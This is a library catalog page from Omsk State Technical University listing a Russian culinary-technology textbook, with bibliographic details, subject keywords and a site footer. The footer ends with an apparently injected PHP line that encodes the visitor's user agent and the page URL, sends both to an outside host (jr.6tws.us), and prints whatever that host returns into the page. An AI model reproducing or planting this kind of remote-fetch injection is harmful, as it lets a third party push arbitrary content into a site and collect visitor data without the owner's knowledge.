Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

90 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Шифр документа=4C2018B3-FA7A-01B2-94DB-D6DB71A7D78D$")И(("Ключевые слова=БЛЮДА ИЗ ТВОРОГА"))
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 1
1. 
4C2018B3-FA7A-01B2-94DB-D6DB71A7D78D
(Нет сведений об экземплярах)
4C2018B3-FA7A-01B2-94DB-D6DB71A7D78D
36.99я7
К56
Ковалев, Н. И.
Технология приготовления пищи [Текст] : учеб. для студ. сред. спец. учеб. заведений / Н. И. Ковалев, М. Н. Куткина, В. А. Кравцова; под ред. М. А. Николаевой ; Отраслевой центр повышения квалификации работников торговли М-ва экономического развития и торговли Российской Федерации. - М. : Деловая лит., 2008. - 467 с. : ил. - ISBN 978-5-93211-044-7 (в пер.) : 90.00 р.
ББК
36.99я7

Рубрики:
Общественное питание -- Технология приготовления -- УЧЕБНЫЕ ПОСОБИЯ

Кл.слова (ненормированные): кулинария - история -- технология общественного питания -- классификация кулинарной продукции -- ассортимент кулинарной продукции -- обработка овощей -- обработка плодов -- обработка грибов -- обработка рыбы -- обработка нерыбного водного сырья -- обработка мяса -- обработка дичи -- обработка птицы -- обработка кроликов -- супы -- соус -- блюда из овощей -- блюда из грибов -- блюда из круп -- блюда из бобовых -- блюда из макаронных изделий -- блюда рыбные -- блюда мясные -- блюда из птицы -- блюда из яиц -- блюда из творога -- блюда сладкие -- блюда холодные -- напитки -- блюда из муки -- питание лечебное -- питание школьников -- питание диетическое
Доп. точки доступа:
Куткина, М. Н.
Кравцова, В. А.
Николаева, М. А.ред.

Нет сведений об экземплярах
Держатели документа:
Омский экономический институт : Россия, г. Омск, пр. Комарова, 13
Ключевые слова 
КУЛИНАРИЯ - История -- ТЕХНОЛОГИЯ общественного питания -- КЛАССИФИКАЦИЯ кулинарной продукции -- АССОРТИМЕНТ кулинарной продукции -- ОБРАБОТКА овощей -- ОБРАБОТКА плодов -- ОБРАБОТКА грибов -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА нерыбного водного сырья -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА КРОЛИКОВ -- Супы -- СОУС -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА из бобовых -- БЛЮДА ИЗ макаронных изделий -- БЛЮДА РЫБНЫЕ -- БЛЮДА МЯСНЫЕ -- БЛЮДА из птицы -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА СЛАДКИЕ -- БЛЮДА ХОЛОДНЫЕ -- НАПИТКИ -- БЛЮДА из муки -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ПИТАНИЕ школьников -- ПИТАНИЕ ДИЕТИЧЕСКОЕ
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3020 - 16.09.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.81 с.14 запросов, 0.66c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;